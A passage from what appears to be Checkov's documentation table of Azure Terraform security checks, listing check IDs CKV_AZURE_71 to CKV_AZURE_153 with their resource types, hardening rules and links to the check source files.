1308 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | +| 1309 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1310 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1311 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | +| 1312 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1313 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1314 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | 
[AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1315 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | +| 1316 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | +| 1317 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | +| 1318 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | +| 1319 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1320 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | +| 1321 | CKV_AZURE_78 | resource | azurerm_app_service 
| Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1322 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1323 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1324 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | +| 1325 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1326 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1327 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | +| 1328 | CKV_AZURE_82 | resource | 
azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | +| 1329 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | +| 1330 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | +| 1331 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | +| 1332 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | +| 1333 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | +| 1334 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | 
[AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1335 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1336 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1337 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | +| 1338 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | +| 1339 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1340 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1341 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | 
[AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | +| 1342 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1343 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1344 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1345 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) | +| 1346 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1347 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1348 | CKV_AZURE_98 
| resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) | +| 1349 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) | +| 1350 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) | +| 1351 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) | +| 1352 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) | +| 1353 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) | +| 1354 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | 
[DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) | +| 1355 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) | +| 1356 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) | +| 1357 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) | +| 1358 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) | +| 1359 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) | +| 1360 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) | +| 1361 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft 
delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) | +| 1362 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) | +| 1363 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) | +| 1364 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) | +| 1365 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) | +| 1366 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) | +| 1367 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) | +| 1368 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | 
[NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) | +| 1369 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) | +| 1370 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1371 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1372 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) | +| 1373 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) | +| 1374 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) | +| 1375 | CKV_AZURE_124 | resource | 
azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) | +| 1376 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) | +| 1377 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) | +| 1378 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) | +| 1379 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) | +| 1380 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | +| 1381 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | 
[PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) | +| 1382 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) | +| 1383 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) | +| 1384 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) | +| 1385 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) | +| 1386 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) | +| 1387 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) | +| 1388 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) | +| 1389 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) | +| 1390 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) | +| 1391 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) | +| 1392 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) | +| 1393 | CKV_AZURE_142 | resource | 
azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) | +| 1394 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) | +| 1395 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) | +| 1396 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1397 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1398 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1399 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | 
[FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1400 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1401 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1402 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | +| 1403 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | +| 1404 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | +| 1405 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 
1406 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 1407 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | +| 1408 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | +| 1409 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | +| 1410 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1411 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1412 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | 
